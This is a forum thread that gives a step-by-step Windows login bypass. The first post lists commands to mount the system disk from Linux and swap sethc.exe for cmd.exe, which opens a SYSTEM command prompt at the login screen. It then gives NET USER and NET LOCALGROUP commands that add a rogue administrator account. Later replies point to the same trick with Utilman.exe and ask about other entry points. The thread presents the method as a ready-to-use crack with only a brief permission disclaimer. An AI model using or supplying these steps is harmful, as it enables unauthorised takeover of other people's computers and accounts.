Hack Windows: System privilege command prompt

[coolydudey60]

This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. shouldn't take more than 3 minutes. It replaces sethc.exe which can be invoked at start-up by pressing shift five times (something to do with contrast) with cmd.exe: Since you haven't logged in yet it opens a command prompt with system privileges (runs in backtrack).

Code:

mkdir /mnt/ntfs
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
cd /mnt/ntfs/windows/system32
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
sync
cd ~
umount /mnt/ntfs
shutdown –r now

To make a new admin that you can login to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)

Code:

NET USER admin pass /add
NET LOCALGROUP administrators admin /add

reboot and you're done.
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine).
(please only use on your own computer or with other people's permission)

[Tigerbeard]

FYI, the same trick can be used by replacing Utilman.exe, but different key sequence. Here's a blog post about it: http://blog.didierstevens.com/2006/0...th-utilmanexe/
Almost 5 years old too. Still, a good trick.

[bambuka]

Maybe its possible to execute this directly i.e. on the Windows Setup -> Tools -> CommandPrompt ?

Remember there was a trick on XP with the screensaver and cmd.exe ?! could that be the same?